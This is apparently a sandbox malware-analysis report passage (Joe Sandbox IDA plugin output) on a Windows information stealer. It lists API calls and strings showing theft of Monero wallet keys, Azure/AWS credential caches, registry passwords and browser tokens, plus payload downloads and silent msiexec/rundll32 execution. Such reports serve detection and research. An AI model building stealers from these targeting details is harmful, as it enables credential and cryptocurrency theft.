                         • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                        • String ID:
                        • API String ID: 1956182324-0
                        • Opcode ID: 15953f440051f5ad25154899d1fe01a6dfd50ece17e38b85b8776f7dcd14dca9
                        • Instruction ID: 570d6f34e38d72a6a4d0752208195e112c6980659ed3e248e0aa7942dd380b07
                        • Opcode Fuzzy Hash: 15953f440051f5ad25154899d1fe01a6dfd50ece17e38b85b8776f7dcd14dca9
                        • Instruction Fuzzy Hash: 4AE163758411089BDB18FBA0ED96EEE7378FF14711F104068F117A7091DE39AE86EB62
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,008AD5F0,00000000,?,00F2144C,00000000,?,?), ref: 00F0CA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00F0CA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00F0CA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F0CAA8
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00F0CAD9
                        • StrStrA.SHLWAPI(?,008AD6E0,00F20B52), ref: 00F0CAF7
                        • StrStrA.SHLWAPI(00000000,008AD650), ref: 00F0CB1E
                        • StrStrA.SHLWAPI(?,008AE1B8,00000000,?,00F21458,00000000,?,00000000,00000000,?,008A9940,00000000,?,00F21454,00000000,?), ref: 00F0CCA2
                        • StrStrA.SHLWAPI(00000000,008AE078), ref: 00F0CCB9
                          • Part of subcall function 00F0C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00F0C871
                          • Part of subcall function 00F0C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00F0C87C
                        • StrStrA.SHLWAPI(?,008AE078,00000000,?,00F2145C,00000000,?,00000000,008A9780), ref: 00F0CD5A
                        • StrStrA.SHLWAPI(00000000,008A9AB0), ref: 00F0CD71
                          • Part of subcall function 00F0C820: lstrcat.KERNEL32(?,00F20B46), ref: 00F0C943
                          • Part of subcall function 00F0C820: lstrcat.KERNEL32(?,00F20B47), ref: 00F0C957
                          • Part of subcall function 00F0C820: lstrcat.KERNEL32(?,00F20B4E), ref: 00F0C978
                        • lstrlen.KERNEL32(00000000), ref: 00F0CE44
                        • CloseHandle.KERNEL32(00000000), ref: 00F0CE9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                        • String ID:
                        • API String ID: 3744635739-3916222277
                        • Opcode ID: c38e4034d6eac2d76ecc8d95c3a0a4987918262483a3f5771d507bfa3b551d4a
                        • Instruction ID: 79b4607ae711725ec333c115f8f668771e28c08811d4f3e0b69a89e05bf6c55e
                        • Opcode Fuzzy Hash: c38e4034d6eac2d76ecc8d95c3a0a4987918262483a3f5771d507bfa3b551d4a
                        • Instruction Fuzzy Hash: B4E10E71D01108ABDB18EBA0DD92FEEB778AF14710F404169F10767191EF396ACADBA1
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        • RegOpenKeyExA.ADVAPI32(00000000,008ABB40,00000000,00020019,00000000,00F205B6), ref: 00F183A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00F18426
                        • wsprintfA.USER32 ref: 00F18459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00F1847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 00F1848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 00F18499
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 3246050789-3278919252
                        • Opcode ID: 60584a9abf346077c22e5150ee3244d86572c43d6f491537b01863d76b530403
                        • Instruction ID: 9d8e24c560d28c4c7e9f4fb3749964aab54333cee71499addbad6ef1c316d040
                        • Opcode Fuzzy Hash: 60584a9abf346077c22e5150ee3244d86572c43d6f491537b01863d76b530403
                        • Instruction Fuzzy Hash: 8E811C75951118ABEB28DB50DD91FEAB7B8FF48710F008298E10AA6180DF756FC6DF90
                        APIs
                          • Part of subcall function 00F18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F18E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00F14DB0
                        • lstrcat.KERNEL32(?,\.azure\), ref: 00F14DCD
                          • Part of subcall function 00F14910: wsprintfA.USER32 ref: 00F1492C
                          • Part of subcall function 00F14910: FindFirstFileA.KERNEL32(?,?), ref: 00F14943
                        • lstrcat.KERNEL32(?,00000000), ref: 00F14E3C
                        • lstrcat.KERNEL32(?,\.aws\), ref: 00F14E59
                          • Part of subcall function 00F14910: StrCmpCA.SHLWAPI(?,00F20FDC), ref: 00F14971
                          • Part of subcall function 00F14910: StrCmpCA.SHLWAPI(?,00F20FE0), ref: 00F14987
                          • Part of subcall function 00F14910: FindNextFileA.KERNEL32(000000FF,?), ref: 00F14B7D
                          • Part of subcall function 00F14910: FindClose.KERNEL32(000000FF), ref: 00F14B92
                        • lstrcat.KERNEL32(?,00000000), ref: 00F14EC8
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00F14EE5
                          • Part of subcall function 00F14910: wsprintfA.USER32 ref: 00F149B0
                          • Part of subcall function 00F14910: StrCmpCA.SHLWAPI(?,00F208D2), ref: 00F149C5
                          • Part of subcall function 00F14910: wsprintfA.USER32 ref: 00F149E2
                          • Part of subcall function 00F14910: PathMatchSpecA.SHLWAPI(?,?), ref: 00F14A1E
                          • Part of subcall function 00F14910: lstrcat.KERNEL32(?,008AF2A8), ref: 00F14A4A
                          • Part of subcall function 00F14910: lstrcat.KERNEL32(?,00F20FF8), ref: 00F14A5C
                          • Part of subcall function 00F14910: lstrcat.KERNEL32(?,?), ref: 00F14A70
                          • Part of subcall function 00F14910: lstrcat.KERNEL32(?,00F20FFC), ref: 00F14A82
                          • Part of subcall function 00F14910: lstrcat.KERNEL32(?,?), ref: 00F14A96
                          • Part of subcall function 00F14910: CopyFileA.KERNEL32(?,?,00000001), ref: 00F14AAC
                          • Part of subcall function 00F14910: DeleteFileA.KERNEL32(?), ref: 00F14B31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 949356159-974132213
                        • Opcode ID: 11b84b4a78639188fbbc029aec3309e005f95f6f66da57e6dd38827aa649b195
                        • Instruction ID: 9e98816291579fd3cf2319167cb6a518a3e9fc6b7ef977d5a0975c4da1ad21da
                        • Opcode Fuzzy Hash: 11b84b4a78639188fbbc029aec3309e005f95f6f66da57e6dd38827aa649b195
                        • Instruction Fuzzy Hash: E641A6BA94021467DB24F770FC47FED3738AB64700F404454B646660C1EEB99BD9EB92
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00F1906C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
                        • Opcode ID: 1fa38d7c4cb2870998e4f79864fca33de63c303c46596eb9c4229ca7a4bb015c
                        • Instruction ID: a42f1afa45231dd7bf3602c0bfbb14c3ccc2643e61c857d8a6e5efb6a27f5f60
                        • Opcode Fuzzy Hash: 1fa38d7c4cb2870998e4f79864fca33de63c303c46596eb9c4229ca7a4bb015c
                        • Instruction Fuzzy Hash: 42711075940208ABDB18DFE4EC99FEEB7B8FF48701F108118F516A7284DB74A985DB60
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00F131C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00F1335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00F134EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                        • API String ID: 2507796910-3625054190
                        • Opcode ID: 0332d2d44c7c5795813932c06444fd83978ef5d4079f39ba738e29670f6cce5f
                        • Instruction ID: ae9f558b8f834ee52385a7b266e489dde0b986e484a78bd9849471c5c58fa7fc
                        • Opcode Fuzzy Hash: 0332d2d44c7c5795813932c06444fd83978ef5d4079f39ba738e29670f6cce5f
                        • Instruction Fuzzy Hash: 101210718011089ADB19FBA0DD92FEDB738AF14320F504159F50666191EF386BCBEFA2
                        APIs
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                          • Part of subcall function 00F06280: InternetOpenA.WININET(00F20DFE,00000001,00000000,00000000,00000000), ref: 00F062E1
                          • Part of subcall function 00F06280: StrCmpCA.SHLWAPI(?,008AF278), ref: 00F06303
                          • Part of subcall function 00F06280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F06335
                          • Part of subcall function 00F06280: HttpOpenRequestA.WININET(00000000,GET,?,008AE690,00000000,00000000,00400100,00000000), ref: 00F06385
                          • Part of subcall function 00F06280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F063BF
                          • Part of subcall function 00F06280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F063D1
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F15318
                        • lstrlen.KERNEL32(00000000), ref: 00F1532F
                          • Part of subcall function 00F18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F18E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00F15364
                        • lstrlen.KERNEL32(00000000), ref: 00F15383
                        • lstrlen.KERNEL32(00000000), ref: 00F153AE
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3240024479-1526165396
                        • Opcode ID: 0127f2a659e9a8c2100aca057052b107259e22d523fb5a259b778d5d5084ed55
                        • Instruction ID: 47b90208be3a2556591b4c81c25600c55bd996a133983f37c0c288c40f03107a
                        • Opcode Fuzzy Hash: 0127f2a659e9a8c2100aca057052b107259e22d523fb5a259b778d5d5084ed55
                        • Instruction Fuzzy Hash: 0B511E34911148DBCB18FF60DD92AED7779AF50321F504028F4065B5D1EF396B86EB62
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: e8cccb3beaaca20ec4395b8f56853ab8f931e4fc56dc1f1c270783510420a82c
                        • Instruction ID: d1156d86737cf09de3c43019538894e8a343e3f17e37f176f6dcccab51559771
                        • Opcode Fuzzy Hash: e8cccb3beaaca20ec4395b8f56853ab8f931e4fc56dc1f1c270783510420a82c
                        • Instruction Fuzzy Hash: F7C1E8B59412089BCB18EF60DD89FEE7378BF64300F004598F51A67281EB78AAC5DF91
                        APIs
                          • Part of subcall function 00F18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F18E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00F142EC
                        • lstrcat.KERNEL32(?,008AED50), ref: 00F1430B
                        • lstrcat.KERNEL32(?,?), ref: 00F1431F
                        • lstrcat.KERNEL32(?,008AD6B0), ref: 00F14333
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F18D90: GetFileAttributesA.KERNEL32(00000000,?,00F01B54,?,?,00F2564C,?,?,00F20E1F), ref: 00F18D9F
                          • Part of subcall function 00F09CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00F09D39
                          • Part of subcall function 00F099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F099EC
                          • Part of subcall function 00F099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F09A11
                          • Part of subcall function 00F099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00F09A31
                          • Part of subcall function 00F099C0: ReadFile.KERNEL32(000000FF,?,00000000,00F0148F,00000000), ref: 00F09A5A
                          • Part of subcall function 00F099C0: LocalFree.KERNEL32(00F0148F), ref: 00F09A90
                          • Part of subcall function 00F099C0: CloseHandle.KERNEL32(000000FF), ref: 00F09A9A
                          • Part of subcall function 00F193C0: GlobalAlloc.KERNEL32(00000000,00F143DD,00F143DD), ref: 00F193D3
                        • StrStrA.SHLWAPI(?,008AED38), ref: 00F143F3
                        • GlobalFree.KERNEL32(?), ref: 00F14512
                          • Part of subcall function 00F09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F04EEE,00000000,00000000), ref: 00F09AEF
                          • Part of subcall function 00F09AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00F04EEE,00000000,?), ref: 00F09B01
                          • Part of subcall function 00F09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F04EEE,00000000,00000000), ref: 00F09B2A
                          • Part of subcall function 00F09AC0: LocalFree.KERNEL32(?,?,?,?,00F04EEE,00000000,?), ref: 00F09B3F
                        • lstrcat.KERNEL32(?,00000000), ref: 00F144A3
                        • StrCmpCA.SHLWAPI(?,00F208D1), ref: 00F144C0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00F144D2
                        • lstrcat.KERNEL32(00000000,?), ref: 00F144E5
                        • lstrcat.KERNEL32(00000000,00F20FB8), ref: 00F144F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID:
                        • API String ID: 3541710228-0
                        • Opcode ID: 2605cd22e71f0475debc78da231a2b532cef11a50eecd07f46ae029bfe8b2594
                        • Instruction ID: eb1d96ab2fb9911645425cc297155792e221b3cc9e4b4ce34ab2b4cefc3d6de5
                        • Opcode Fuzzy Hash: 2605cd22e71f0475debc78da231a2b532cef11a50eecd07f46ae029bfe8b2594
                        • Instruction Fuzzy Hash: 2C7196B6D00208ABDB14EBE0EC85FEE7379AF88700F044598F61597181EA38DB85DF91
                        APIs
                          • Part of subcall function 00F012A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F012B4
                          • Part of subcall function 00F012A0: RtlAllocateHeap.NTDLL(00000000), ref: 00F012BB
                          • Part of subcall function 00F012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00F012D7
                          • Part of subcall function 00F012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00F012F5
                          • Part of subcall function 00F012A0: RegCloseKey.ADVAPI32(?), ref: 00F012FF
                        • lstrcat.KERNEL32(?,00000000), ref: 00F0134F
                        • lstrlen.KERNEL32(?), ref: 00F0135C
                        • lstrcat.KERNEL32(?,.keys), ref: 00F01377
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                          • Part of subcall function 00F18B60: GetSystemTime.KERNEL32(00F20E1A,008AAD30,00F205AE,?,?,00F013F9,?,0000001A,00F20E1A,00000000,?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F18B86
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00F01465
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                          • Part of subcall function 00F099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F099EC
                          • Part of subcall function 00F099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F09A11
                          • Part of subcall function 00F099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00F09A31
                          • Part of subcall function 00F099C0: ReadFile.KERNEL32(000000FF,?,00000000,00F0148F,00000000), ref: 00F09A5A
                          • Part of subcall function 00F099C0: LocalFree.KERNEL32(00F0148F), ref: 00F09A90
                          • Part of subcall function 00F099C0: CloseHandle.KERNEL32(000000FF), ref: 00F09A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 00F014EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 3478931302-218353709
                        • Opcode ID: 47a089ae25808970b3b1b81c241073e3eba7dc5d8bdc1d344345bcfc57525040
                        • Instruction ID: 2726b6d0b945e6efca2fb1dec12d4001c173c5c71e6a7409677382549f218c3b
                        • Opcode Fuzzy Hash: 47a089ae25808970b3b1b81c241073e3eba7dc5d8bdc1d344345bcfc57525040
                        • Instruction Fuzzy Hash: E45155B1D5011897DB15FB60DD92FED733CAF54710F4041A8B60A620C1EE786BC6DBA6
                        APIs
                          • Part of subcall function 00F072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00F0733A
                          • Part of subcall function 00F072D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00F073B1
                          • Part of subcall function 00F072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00F0740D
                          • Part of subcall function 00F072D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00F07452
                          • Part of subcall function 00F072D0: HeapFree.KERNEL32(00000000), ref: 00F07459
                        • lstrcat.KERNEL32(00000000,00F217FC), ref: 00F07606
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00F07648
                        • lstrcat.KERNEL32(00000000, : ), ref: 00F0765A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00F0768F
                        • lstrcat.KERNEL32(00000000,00F21804), ref: 00F076A0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00F076D3
                        • lstrcat.KERNEL32(00000000,00F21808), ref: 00F076ED
                        • task.LIBCPMTD ref: 00F076FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                        • String ID: :
                        • API String ID: 2677904052-3653984579
                        • Opcode ID: f05763f06c3088ef3d08e72595565d6e8bf32358213f08445ee9a3d48c32b706
                        • Instruction ID: 6b1f4d95dd5db24f2da215327fcfce95b106b6b7b88e5da6edbb4997f6c473b1
                        • Opcode Fuzzy Hash: f05763f06c3088ef3d08e72595565d6e8bf32358213f08445ee9a3d48c32b706
                        • Instruction Fuzzy Hash: 02314D7AD40209DBDB18EBE4EC95DEE7774FF48701B104128E117A7284DA38A986EB51
                        APIs
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                          • Part of subcall function 00F047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F04839
                          • Part of subcall function 00F047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F04849
                        • InternetOpenA.WININET(00F20DF7,00000001,00000000,00000000,00000000), ref: 00F0610F
                        • StrCmpCA.SHLWAPI(?,008AF278), ref: 00F06147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00F0618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00F061B3
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00F061DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F0620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00F06249
                        • InternetCloseHandle.WININET(?), ref: 00F06253
                        • InternetCloseHandle.WININET(00000000), ref: 00F06260
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID:
                        • API String ID: 2507841554-0
                        • Opcode ID: 5d8df85d2a575f95fbbaa135716ad41dbe0258950befaa7e1d6ab5010135de0f
                        • Instruction ID: f2c45a684e3852c1a1e8d870fa58e6afb38cf7ccd646ceb1072eeba851390f6c
                        • Opcode Fuzzy Hash: 5d8df85d2a575f95fbbaa135716ad41dbe0258950befaa7e1d6ab5010135de0f
                        • Instruction Fuzzy Hash: CA519FB1940218ABDF24DF60DD49BEE77B8EF04701F1080A8B606A71C0DB756AC9EF95
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00F0733A
                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00F073B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00F0740D
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00F07452
                        • HeapFree.KERNEL32(00000000), ref: 00F07459
                        • task.LIBCPMTD ref: 00F07555
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuetask
                        • String ID: Password
                        • API String ID: 775622407-3434357891
                        • Opcode ID: 48562bf62f22388ec75b80c10dbc4295eef80f2a51d42830a251ef5e7e68eabf
                        • Instruction ID: 5d1266f1fce0709cbb4a0fa27ebba44e1d6e4618e981554794bd66d3bb29f1c8
                        • Opcode Fuzzy Hash: 48562bf62f22388ec75b80c10dbc4295eef80f2a51d42830a251ef5e7e68eabf
                        • Instruction Fuzzy Hash: 2D612CB5D04268DBDB24DB50DC41BDAB7B8BF44340F0081E9E689A6181DFB46BC9EF90
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                        • lstrlen.KERNEL32(00000000), ref: 00F0BC9F
                          • Part of subcall function 00F18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F18E52
                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 00F0BCCD
                        • lstrlen.KERNEL32(00000000), ref: 00F0BDA5
                        • lstrlen.KERNEL32(00000000), ref: 00F0BDB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 3073930149-1079375795
                        • Opcode ID: 68c53fd725c71a443f9ff1d5518e69a5008169e50c12cab59fb0697482602060
                        • Instruction ID: b418ed721b62f996658820a17542180a57de0845be32896941c3052d481b292e
                        • Opcode Fuzzy Hash: 68c53fd725c71a443f9ff1d5518e69a5008169e50c12cab59fb0697482602060
                        • Instruction Fuzzy Hash: 52B151719111089BDB14FBA0DD96EEE7339AF54320F404168F507A70D1EF396E89EBA2
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: *
                        • API String ID: 1494266314-163128923
                        • Opcode ID: 7ae449d69f8ab0adaf249a0abbf1066911f8fa41f7bb7456d04ecac18512fb3a
                        • Instruction ID: 46a9bb46e4c2414400565c90cd4760b860c0235a263dcde4065e2d10c139abc2
                        • Opcode Fuzzy Hash: 7ae449d69f8ab0adaf249a0abbf1066911f8fa41f7bb7456d04ecac18512fb3a
                        • Instruction Fuzzy Hash: 46F01734984209EBE368DFE0A5197687B74FB04B03F0501A8F61B87284DA714A819B95
                        APIs
